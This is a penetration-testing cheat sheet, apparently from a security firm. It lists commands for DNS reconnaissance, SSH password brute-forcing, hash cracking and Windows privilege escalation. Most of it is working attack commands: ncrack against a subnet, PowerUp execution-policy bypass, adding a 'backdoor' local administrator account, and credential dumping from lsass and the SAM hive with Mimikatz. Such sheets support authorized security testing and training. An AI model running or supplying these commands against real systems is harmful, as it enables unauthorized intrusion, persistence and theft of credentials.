Information Gathering
Find owner/contact of domain or IP address:
# whois compass-security.com
Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com
Get hostnames from CT logs: Search for
%.compass-security.com on https://crt.sh.
Or using an nmap script:
# nmap -sn -Pn compass-security.com
–script hostmap-crtsh
Cracking
Try SSH passwords from a wordlist:
# ncrack -p 22 –user root -P
./passwords.txt 10.5.23.0/24
Determine hash type:
# hashid 869d[…]bd88
Show example hash types for hashcat:
# hashcat –example-hashes
Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt
/path/to/wordlists/*
Crack hashes using John the Ripper:
# john hashes.txt
Windows Privilege Escalation
Copy PowerUp.ps1 from GitHub “PowerShellMafia/
PowerSploit” into PowerShell to
bypass ExecutionPolicy and execute Invoke-
AllChecks. Use the abuse functions.
Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators
backdoor /add
Scan for network shares:
# smbmap.py –host-file smbhosts.txt –
u Administrator -p PasswordOrHash
Windows Credentials Gathering
Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log
Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.
Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords
Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv
Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv
/sam:sam.hiv
TLS Tools
Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048
-keyout key.pem -out cert.pem -nodes
-subj “/CN=example.org/”
Start TLS Server:
# ncat –ssl -l -p 1337 –ssl-cert
cert.pem –ssl-key key.pem
Connect to TLS service:
# ncat –ssl 10.5.23.42 1337
Connect to TLS service using openssl:
# openssl s_client -connect
10.5.23.42:1337